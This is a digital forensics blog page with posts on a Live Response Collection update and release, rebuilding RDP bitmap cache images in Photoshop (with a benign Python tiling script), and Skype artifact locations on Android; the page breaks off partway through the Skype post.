<b><span style="font-size: large;">BriMor Labs</span></b><br />Welcome to the BriMor Labs blog. BriMor Labs is located near Baltimore, Maryland. We specialize in offering Digital Forensics, Incident Response, and Training solutions to our clients.
Now with 1000% more blockchain!<br />
<b><span style="font-size: large;">Small Cedarpelta Update</span></b> (Brian Moran, September 5, 2019)<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Good morning readers and welcome back! This is going to be a very short blog post to inform everyone that a very minor update to the Cedarpelta version of the Live Response Collection has been published. This change was needed because, as an anonymous comment pointed out, when a user chose one of the three "Secure" options the script(s) failed due to an update to the SDelete tool. I changed the module to ensure that it works properly with the new version of the executable and published the update earlier this morning. As always, if you have any feedback or would like to see additional data collected by the LRC, please let me know!</span><br />
<br />
<span style="font-size: large;"><br /><a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a> <br /><br />MD5: 7bc32091c1e7d773162fbdc9455f6432<br />SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63<br />Updated: September 5, 2019</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><b><span style="font-size: large;">Phinally Using Photoshop to Phacilitate Phorensic Analysis</span></b> (Brian Moran, June 20, 2019)<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<span style="font-size: large; text-align: start;">Hello again readers, and welcome back! Today's blog post is going to cover the process that I personally use to rearrange and correlate RDP Bitmap Cache data in Photoshop. Yes, I am aware that some of you know me primarily for my Photoshop productions in presentations and logos (and HDR photography, a hobby I do not spend nearly enough time on!), but the time has finally come when I can utilize Photoshop as part of my forensic analysis process!</span><br />
<div style="text-align: left;">
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">First off, if you are not aware, when a user establishes an RDP (Remote Desktop Protocol) connection, there are files that are typically saved on the user’s system (the source host). These files have changed in name and in format over the years, but they are commonly stored under the path “%USERPROFILE%\AppData\Local\Microsoft\Terminal Server Client\Cache\”. You will usually have a file with a .bmc extension, and on Windows 7 and newer systems you will also likely see files</span><span style="background-color: transparent; font-family: inherit; font-size: large;"> named “cache0000.bin” (these are incrementally numbered starting at 0000). This was introduced on Windows 7 and should be searchable by the naming convention “cache{4-digits}.bin”. Both file types contain what are essentially small chunks (tiles) of screenshots of the remote desktop. The most reliable tool that I have found to parse this data is bmc-tools, which can be downloaded from <a href="https://github.com/ANSSI-FR/bmc-tools" style="background-color: transparent; font-family: inherit;">https://github.com/ANSSI-FR/bmc-tools</a>. The process for extracting the data is straightforward: you point the script at a cache####.bin file and extract it to a folder of your choice. Once done, you end up with a folder filled with small bitmap images.</span></div>
</div>
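<span style="font-size: large;">As an added example (not code from the post and not part of bmc-tools), the following stand-alone Python script tiles a folder of the extracted bitmaps into one contact-sheet BMP, so all of the pieces can be viewed together before any manual rearranging begins. It assumes the tiles are uncompressed, bottom-up 24- or 32-bpp BMP files and uses only the standard library.</span><br />

```python
"""Tile a folder of RDP bitmap-cache tiles (as written out by a cache parser
such as bmc-tools) into one contact-sheet BMP.

Added example; not part of the original post or of bmc-tools. Assumes the
tiles are uncompressed, bottom-up 24- or 32-bpp BMP files. Standard library only.
"""
import struct
from pathlib import Path


def read_bmp(data: bytes):
    """Return (width, height, rows) for an uncompressed 24/32-bpp BMP.
    rows is top row first; each pixel is a (b, g, r) tuple of ints."""
    if data[:2] != b"BM":
        raise ValueError("not a BMP file")
    pix_off = struct.unpack_from("<I", data, 10)[0]
    _, width, height, _, bpp, comp = struct.unpack_from("<IiiHHI", data, 14)
    if comp != 0 or bpp not in (24, 32):
        raise ValueError(f"unsupported BMP: bpp={bpp} compression={comp}")
    bottom_up = height > 0              # negative height means top-down storage
    height = abs(height)
    bpp_bytes = bpp // 8
    stride = (width * bpp_bytes + 3) & ~3   # rows are padded to 4-byte boundaries
    rows = []
    for y in range(height):
        base = pix_off + y * stride
        rows.append([tuple(data[base + x * bpp_bytes: base + x * bpp_bytes + 3])
                     for x in range(width)])    # drops the alpha byte of 32-bpp tiles
    if bottom_up:
        rows.reverse()
    return width, height, rows


def write_bmp(width: int, height: int, rows) -> bytes:
    """Serialise top-first rows of (b, g, r) tuples as a 24-bpp bottom-up BMP."""
    stride = (width * 3 + 3) & ~3
    pad = b"\0" * (stride - width * 3)
    body = b"".join(bytes(c for px in row for c in px) + pad for row in reversed(rows))
    dib = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(body),
                      2835, 2835, 0, 0)
    head = struct.pack("<2sIHHI", b"BM", 14 + 40 + len(body), 0, 0, 14 + 40)
    return head + dib + body


def build_contact_sheet(tiles, columns: int, fill=(0, 0, 0)):
    """Lay the tiles out left-to-right, top-to-bottom, `columns` per row.
    Every cell is the size of the largest tile so nothing overlaps.
    Returns (width, height, rows) in the same layout read_bmp uses."""
    parsed = [read_bmp(t) for t in tiles]
    cell_w = max(w for w, _, _ in parsed)
    cell_h = max(h for _, h, _ in parsed)
    n_rows = -(-len(parsed) // columns)     # ceiling division
    sheet = [[fill] * (cell_w * columns) for _ in range(cell_h * n_rows)]
    for i, (w, h, rows) in enumerate(parsed):
        ox, oy = (i % columns) * cell_w, (i // columns) * cell_h
        for y in range(h):
            sheet[oy + y][ox:ox + w] = rows[y]
    return cell_w * columns, cell_h * n_rows, sheet


def tile_directory(src_dir, out_path, columns: int = 16):
    """Read every *.bmp in src_dir in name order (the parser's extraction
    order, which follows cache order) and write one contact sheet.
    Returns (sheet width, sheet height, number of tiles)."""
    tiles = [p.read_bytes() for p in sorted(Path(src_dir).glob("*.bmp"))]
    if not tiles:
        raise FileNotFoundError(f"no .bmp tiles found in {src_dir}")
    w, h, sheet = build_contact_sheet(tiles, columns)
    Path(out_path).write_bytes(write_bmp(w, h, sheet))
    return w, h, len(tiles)


def solid_tile(width: int, height: int, bgr) -> bytes:
    """Constructed sample input: a single-colour 24-bpp tile."""
    return write_bmp(width, height, [[tuple(bgr)] * width for _ in range(height)])


if __name__ == "__main__":
    # Constructed stand-in for a parser output folder: three 4x4 tiles, two per row.
    demo = [solid_tile(4, 4, (255, 0, 0)), solid_tile(4, 4, (0, 255, 0)),
            solid_tile(4, 4, (0, 0, 255))]
    w, h, sheet = build_contact_sheet(demo, columns=2)
    print(f"contact sheet is {w}x{h}; top-left pixel (b, g, r) = {sheet[0][0]}")
```

Point tile_directory at the folder bmc-tools produced and open the resulting BMP in any viewer; the grid keeps the tiles in extraction order, which is often enough to spot which pieces belong to the same window.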
<div style="text-align: left;">
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now begins the phun part! </span><span style="font-size: large;">The bitmaps will need to be rearranged manually to reconstruct the screenshot as best as possible (like a jigsaw puzzle for forensic enthusiasts). </span><span style="font-size: large;">This is not an exact science, and in many cases it relies on educated best guesses. </span><span style="font-size: large;">While this could be a very manual and tedious process, Adobe Photoshop can be used to automate the import of the files. Then you can rebuild the item(s) as you see fit!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">First, view the contents of the folder in Windows Explorer, or in Adobe Bridge (included in the Adobe Photoshop CC bundle) for Mac users. I found that Preview does not work; it does not render the bitmaps properly.</span><span style="font-size: large;"> Rather than spending valuable time trying to figure out why that is, I just used Bridge. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Next select the bitmaps of the activity you’d like to reconstruct, go into Photoshop, and choose </span><span style="font-size: large;">"File-Scripts-Load Files into Stack...":</span></div>
<span style="font-size: large; text-align: start;"></span><br />
<span style="font-size: large; text-align: start;">
</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC9EhKUzsZfik8SS1uFvKPSU8bELC6egh_lUPD7t8uYAWJy-tyk_zWA8eCXa8o0UnElVRJENP5QWPWNfh7nk6GpT7ZlNdK_gR5FCHTvtskqAbna3X1sOF_cfuo8ONWl8a1dE592UUOBIh2/s1600/PhotoshopCC-Scripts-LoadFilesStack.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="800" data-original-width="1105" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC9EhKUzsZfik8SS1uFvKPSU8bELC6egh_lUPD7t8uYAWJy-tyk_zWA8eCXa8o0UnElVRJENP5QWPWNfh7nk6GpT7ZlNdK_gR5FCHTvtskqAbna3X1sOF_cfuo8ONWl8a1dE592UUOBIh2/s640/PhotoshopCC-Scripts-LoadFilesStack.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption"><span style="font-size: small;"><i>Photoshop fortunately has a script to import multiple files into one workspace (it is called a "Stack")</i></span></td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;">This will allow you to choose multiple files, to import into Photoshop all at once. </span><span style="font-size: large;">You will be presented with a “Load Layers” option. Select the “Browse” button, and then browse to the folder that contains the bitmap files you wish to load:</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu4rhA_NhzF8jtadp7TBVpkMuWl_xEk6IvELV8e2naaYXXel857X3sw-A1Y0mjxBWvZf7L86B9ghi-oQdT16Mu-orotSH2edIMR_QysFngywU8978h04zU3tEOa4g_fFLPti9S624Vcqg9/s1600/Screen+Shot+2019-06-20+at+11.17.47+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="574" data-original-width="691" height="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu4rhA_NhzF8jtadp7TBVpkMuWl_xEk6IvELV8e2naaYXXel857X3sw-A1Y0mjxBWvZf7L86B9ghi-oQdT16Mu-orotSH2edIMR_QysFngywU8978h04zU3tEOa4g_fFLPti9S624Vcqg9/s640/Screen+Shot+2019-06-20+at+11.17.47+AM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The "Load Layers" dialogue box. In order to choose the file(s) you want to open, click "Browse..."</span></i></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tOF0P40BjOt3ZSHkx-__NS86RRVSPSEOnFPLCGEkq2z9a4ZoaB3vkwb_fQM8VVHrfVb0ab5NGtRqvbsBGjupRttShR-_oJuPdYNhaNGG9TiUeQT5c4Ba8FEc8NDpfJYyFugPl9GVVdzO/s1600/Load_Files_Into_Stack.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="563" data-original-width="691" height="520" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tOF0P40BjOt3ZSHkx-__NS86RRVSPSEOnFPLCGEkq2z9a4ZoaB3vkwb_fQM8VVHrfVb0ab5NGtRqvbsBGjupRttShR-_oJuPdYNhaNGG9TiUeQT5c4Ba8FEc8NDpfJYyFugPl9GVVdzO/s640/Load_Files_Into_Stack.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose the files that you wish to load</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once you’ve selected the bitmap files, you will see the “Load Layers” box is populated with those files:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI9DGfuJGH4IMOUYtIVoXt_bdhrGDOdJ7nf3hpUp-g5aJeT6gJHxelBBDRobjBEU2UpxM_NrBeNUNu3aj1ofbbglBAo7i8QUle7FFqJ3uflNtCdMye-RTdkRu1ZRwRw_y3IZ2DDNdgjkTE/s1600/LoadLayers.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="382" data-original-width="554" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI9DGfuJGH4IMOUYtIVoXt_bdhrGDOdJ7nf3hpUp-g5aJeT6gJHxelBBDRobjBEU2UpxM_NrBeNUNu3aj1ofbbglBAo7i8QUle7FFqJ3uflNtCdMye-RTdkRu1ZRwRw_y3IZ2DDNdgjkTE/s640/LoadLayers.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;"><i><span style="font-size: small;">After selecting the files, the "Load Layers" box will now be populated</span></i></td></tr>
</tbody></table>
<span style="font-size: large; text-align: start;"></span><br />
<div style="text-align: left;">
<span style="font-size: large; text-align: start;">Click "OK", and the import process will begin. This might take a little while depending on the number of images you selected. Once the import is complete, a new workspace is created in which each file is loaded as a layer. Highlight all of the layers (scroll to the top and click on the top entry, then scroll to the bottom and click on the bottom entry while holding "Shift"), then copy the layers. You can now paste them into your original workspace and rearrange and rename the layers however you like in an effort to reconstruct the activity:</span></div>
<span style="font-size: large; text-align: start;">
</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: start;">
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" data-original-height="467" data-original-width="237" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIFpMzZzmKPU61ZqQ5pU_a7xTyIi0e6aNHjHzqffE_Rao_fmhNaBXnjtTSTDC0-tHx_zpQlQj1ArNLDBjMJ59pU_m_nEOgxTNEm5s9pjAhz_b5HuguGd03EpjpzgJhS4_L2QBU6fp_-ut4/s640/LayersLoaded_New-Window.png" style="margin-left: auto; margin-right: auto;" width="324" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;"><i><span style="font-size: small;">Select all of the layers and copy them</span></i></td></tr>
</tbody></table>
<div style="font-size: medium; text-align: start;">
</div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP0DCwN5KxIsYFBbCY89QeUrL8x5UmLp0ZdX5X__XaPlAwIyPXtTyh0_lcN0YEj9vPf9bQRCkE1PJcCOkswBj6wgZ4XmUPT2mjNP99ttj1hmbjjbQPDSnHhTITDdpLZnIRpbPcioskih6Y/s1600/Copy_All-Layers.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: justify;"><span style="color: black;"><img border="0" data-original-height="360" data-original-width="233" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP0DCwN5KxIsYFBbCY89QeUrL8x5UmLp0ZdX5X__XaPlAwIyPXtTyh0_lcN0YEj9vPf9bQRCkE1PJcCOkswBj6wgZ4XmUPT2mjNP99ttj1hmbjjbQPDSnHhTITDdpLZnIRpbPcioskih6Y/s640/Copy_All-Layers.png" width="414" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Paste the layers into your original workspace, and rearrange them to rebuild the activity!</i> </span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" data-original-height="426" data-original-width="572" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMi-ZxZuPVImjjXL3GFjVDUbwDfQvBzG1qZ43_1VO7RZl7LJFuuLqDBwg2W4r1TkgM3RJff2KLY3p7mYeJlx7kVfdtD2MT4x8DHY8lLPxjRUEo4kAQQ0KaW9ZUocjLxdYD9aELuW9QP7wu/s640/Rearrange-Profit.png" style="margin-left: auto; margin-right: auto;" width="640" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;"><span style="font-size: small;"><i>This is an example of the partial output you can recover from rearranging the files to rebuild a window</i></span></td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<span style="font-size: large;"><br />I truly hope that this small tutorial helps with your process </span><span style="font-size: large;">and workload should you find yourself rebuilding RDP session activity. For readers who do not currently own Photoshop, Adobe has </span><span style="font-size: large;">a very inexpensive offering of the Adobe Creative Cloud (CC) for a personal license under the Photography plan, which is</span><span style="font-size: large;"><span style="font-size: medium;"> </span><a href="https://www.adobe.com/creativecloud/plans.html?" rel="nofollow" target="_blank">$9.99 a month.</a></span><span style="font-size: large;"> It is a great deal and one that I have used for my photography hobby for many years. And now on forensic analysis cases that involve RDP bitmap reconstruction! </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><b><span style="font-size: large;">Live Response Collection - Cedarpelta</span></b> (Brian Moran, April 11, 2019)<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;">Hello again readers and welcome back!! Today I would like to announce the public release of updates to the Live Response Collection (LRC), which is named "Cedarpelta". </span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCR4cUaLqn7ml54SYEs_ipvuOicA8830w3-0RM3h3FR2-S9uKQFO1vKOUb6Ow4cky9qeIdrFOHACQ1_6az3UtyPh3Ae8yUN5o8mu9_VRrkkB8WjaDu5OV7143eCOrKjFy4kGy6R0ekRlt4/s1600/logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="350" data-original-width="350" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCR4cUaLqn7ml54SYEs_ipvuOicA8830w3-0RM3h3FR2-S9uKQFO1vKOUb6Ow4cky9qeIdrFOHACQ1_6az3UtyPh3Ae8yUN5o8mu9_VRrkkB8WjaDu5OV7143eCOrKjFy4kGy6R0ekRlt4/s320/logo.jpg" width="320" /></a></div>
<span style="font-size: large;"><br /><br />This may come as a surprise to some, as Bambiraptor was released over two years ago, but over the past several months I've been working on adding more macOS support to the LRC. Part of the work that went into this version was a complete rewrite of all of the bash scripts that the LRC utilizes, which was no small task. Once the rewrite was completed, I focused on my never-ending goal of blending speed, comprehensive data collection, and internal logic to ensure that if something odd was encountered, the script would not endlessly hang or, even worse, collect data that was corrupted or not accurate. So, let's delve into some of the changes that Cedarpelta offers compared to Bambiraptor!</span><br />
<span style="font-size: large;"><br /><br /><b>Windows Live Response Collection</b><br />To be honest, not a whole lot has changed on the Windows side. At the request of a user, I added a new module that collects Cisco AMP databases from endpoints, if the environment utilizes the FireAMP endpoint detection product. The primary reason for this is that the databases themselves contain a WEALTH of information, whereas users of the AMP console are limited to what they can see from the endpoints. The reason for this is likely that it would take a large amount of bandwidth and processing power to process every single item collected by the tool. Since most of this occurs within AWS, the processing costs would scale considerably, which would ultimately cost more to license and use.* (<i>*Please note that I am not a FireAMP developer, and I do not know if this is definitely the case or not, but from my outsider perspective and experience in working with the product, this explanation is the most plausible. If any developers would like to provide a more detailed explanation, I will update this post accordingly!</i>)</span><br />
<span style="font-size: large;"><br /><br /><b>macOS Live Response Collection</b><br />This is the section that has had, by far, the most work done to it. On top of the code rewrite, which makes the scripting more "proper" and also much, much faster, new logic was added to deal with things like System Integrity Protection (SIP) and files/folders that used to be accessible by default but are now locked down by the operating system itself. Support has been added for:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"> - Unified Logs</span><br />
<span style="font-size: large;"> - SSH log files</span><br />
<span style="font-size: large;"> - Browser history files (Safari, Chrome, Tor, Brave, Opera)<br /> - LSQuarantine events<br /> - Even more console logs<br /> - And many, many other items!<br /><br />One of the downsides to the changes to macOS is the fact that things like SIP and operating system lockdowns prevent a typical user from accessing data from certain locations. One example of this is Safari, where by default you cannot copy your own data out of the Safari directory because of the OS protections in place. There are ways around this, by disabling SIP and granting the Terminal application Full Disk Access under Settings, but since the LRC was written to work with a system that is running with default configurations, it will attempt to access these protected files and folders, and if it cannot, it will record what it tried to do and simply move on. Some updates that are in the pipeline for newer versions of macOS may also require additional changes, but we will have to wait for those changes to occur first and then make the updates accordingly.<br /><br />You will most likely no longer be able to perform a memory dump or automate the creation of a disk image on newer versions of macOS with the default settings, because of the updates and security protections native within the OS internals. As I have stated in the past, if you absolutely require these items I highly recommend a solution such as MacQuisition from BlackBag. The purpose of the LRC is, and will always be, to collect data from a wide range of operating systems in an easy fashion, requiring little, if any, user input. It does not matter if you are an experienced incident response professional or have been directed to collect data from your own system by another individual: you simply run the tool, and it collects the data.</span><br />
<span style="font-size: large;"><br /><br /><b>Future Live Response Collection development plans</b><br />As always, the goal of the Live Response Collection is not only to collect data for an investigation; it can also be customized by any user to collect the information and/or data that user desires. Please consider taking the time to develop modules that extract data, and share modules that you have already developed. The next update of the LRC will focus on newer versions of Windows (Windows 10, Server 2019, etc.). I personally am still encountering very few of those systems in the wild, but that is mostly because I tend to deal with larger enterprises, where adoption of a new operating system takes considerable time compared to a typical user who runs down to Best Buy and comes back with a new Windows 10 laptop because the computer they used for a few years no longer works.<br /><br /><br /><b>Remember, a tool is a tool. It is never the final solution</b><br />One last note that I would like to add: please remember that while a lot of work has been put into the LRC to "just work", at the end of the day it is just a tool that is meant to enhance the data collection process. There are many open source tools available to collect data, perhaps more than ever before, and one tool may work where another one failed. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">For example, you might try the <a href="https://github.com/CrowdStrike/automactc" target="_blank">CrowdStrike Mac</a> tool and it might work where the LRC fails, or vice versa. Or you may try to use <a href="https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape" target="_blank">Eric Zimmerman's KAPE</a> on a Windows machine, but it fails because the .NET Framework was not installed. Or you might try to use the LRC on a system running <a href="https://www.cylance.com/en-us/platform/products/index.html" target="_blank">Cylance Protect</a> and it gets blocked because of the "process spawning process" rule. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">In each case you have to give various tools and methods a shot, with the end goal of collecting the information that you want. It is important to remember that YOU (the user of the tool) are the most valuable aspect of the data collection process, and you simply utilize tools to make the collection process faster and smoother!<br /><br /><br /><a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a> <br /><br />MD5: 7bc32091c1e7d773162fbdc9455f6432<br />SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63<br />Updated: September 5, 2019</span><br />
<b><span style="font-size: large;">Skype Hype/Gripe</span></b> (Brian Moran, November 27, 2018)<br />
<span style="font-size: large;">Hello again readers and welcome back! Based on the title of this blog post, I am pretty sure that you already know that we will be covering Skype in this post. As with any good story, it is best to start at the beginning of this magical journey....</span><br />
<span style="font-size: large;"><br /></span>
<b><span style="font-size: large;">Chapter 1: Data generation</span></b><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As some of you may know, I have been involved with the <a href="http://cybersleuthlab.org/" target="_blank">Cyber Sleuth Science Lab</a> since this summer, working on bringing STEM (specifically digital forensics) to high school aged students. This project requires a tremendous amount of behind the scenes work, especially in the scenario data generation realm. For the next phase of the project, we decided that utilizing Skype would be the best chat application to use, because not only could we generate data across several platforms, but we can also extract it in a reliable method from mobile devices. So, I created some Skype conversations on my test device (a Samsung Galaxy S6 Edge, specifically SM-G925F (remember the model number, you will see it again)), made a full image of it, and loaded it into Magnet AXIOM, which the folks at Magnet Forensics have generously made available to the Cyber Sleuth participants. And, surprisingly, I was met with this:</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4EKt1Bi93ZT_sNFGZwl5KqocOgV-dO8eNtt7mO6OMfS7BbvgmELPaTt-3HixzoZgKgzBvyhN7tnUzuGvuZTkkZ0NL-soHeYGjk0bXurO2FgWftj2MV_dgmGnn7GZNM_XLhd4Bp6lCdGRC/s1600/AXIOM-SShot-Skype.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="448" data-original-width="1356" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4EKt1Bi93ZT_sNFGZwl5KqocOgV-dO8eNtt7mO6OMfS7BbvgmELPaTt-3HixzoZgKgzBvyhN7tnUzuGvuZTkkZ0NL-soHeYGjk0bXurO2FgWftj2MV_dgmGnn7GZNM_XLhd4Bp6lCdGRC/s640/AXIOM-SShot-Skype.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Processing in AXIOM found the "main.db" file, but nothing else</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br />Obviously I knew something wasn't right, as I definitely populated data in the application, which I could easily see. But it was not detected in AXIOM, so I had to dig into this a bit more.<br /><br /><br /><b>Chapter 2: A sorta "new" discovery. Kinda-ish</b></span><br />
<br />
<span style="font-size: large;">Obviously one of the main aspects in our career field is that we trust tools to extract known data from known places, but at any time that can change and we have to update our methods (and tools) accordingly. I told <a href="https://twitter.com/B1N2H3X" target="_blank">Jessica</a> about a possible new discovery when I found this at the beginning of November, which I had to put aside for a few weeks as I took part in an incident response case. This week I was able to jump back into it again, and worked on trying to figure out exactly "what" was happening here. Initially, the thought was that Skype had changed a whole bunch of stuff. As it turns out (thankfully) that is not quite the case, but it does bring up a couple of issues to keep in mind if you are looking at mobile devices with Skype usage.<br /><br />The first item to note is the presence of the file "main.db". Historically this was located under the "databases" folder, but now it is located under the "files" folder, specifically under the subfolder "live#<username>". </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrFkra3Nrv-FIuC0-zIYEvbx444m32OjHQK0c_PUesgmpP23HHX-PF8KPToCdNVsll6ne6Ab7Sdy7RDA2r0oiggOAWh13E7IzCVA24GC3PCnR9p33iOU_yGEVzMkI82-AYfJ89UuvcBbzI/s1600/WrongLocation.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="938" data-original-width="1600" height="374" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrFkra3Nrv-FIuC0-zIYEvbx444m32OjHQK0c_PUesgmpP23HHX-PF8KPToCdNVsll6ne6Ab7Sdy7RDA2r0oiggOAWh13E7IzCVA24GC3PCnR9p33iOU_yGEVzMkI82-AYfJ89UuvcBbzI/s640/WrongLocation.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>The main.db file, historically, was not in this location</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
